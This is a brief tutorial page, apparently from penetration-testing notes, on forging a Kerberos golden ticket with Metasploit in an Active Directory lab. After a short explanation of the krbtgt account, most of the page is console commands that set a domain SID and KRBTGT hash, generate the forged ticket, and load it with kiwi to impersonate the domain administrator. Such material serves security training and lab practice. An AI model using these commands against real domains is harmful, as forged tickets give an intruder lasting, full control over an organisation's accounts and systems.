Golden Ticket with Metasploit

KRBTGT is the service account for the Key Distribution Service.

The krbtgt account is nothing but the Key Distribution Center Service Account (KDC) and it is responsible to grant Kerberos authentication ticket (TGT) from Active Directory. The Kerberos authentication protocol uses session tickets that are encrypted with a symmetric key derived from the password of the server or service to which a Windows user requests access.

search golden_ticket
use 0
info
set domain north.newyork.local
set domain sid S-1-5-21-3634065772-4036021599-3644360361
set KRBTGT Hash b215421b300eb02228f7b4e8f8414201
set session 4
run

How to use the Golden Ticket?

session -i 1
#we are still NT Authority\System
getuid
load kiwi
help

#get the tickets list
#to delete all the tickets in there
help
kerberos_ticket_purge
kerberos_ticket_list
kerberos_ticket_use /root/.msf4/loot/657684567_default_192.168.56.11_golden.ticket_654.bin
kerberos_ticket_list

#impersonate with the administrator

PreviousDsSync With Metasploit from NT Autority/System to Administrator NextUsing a Keylogger with Metasploit

Last updated 2 years ago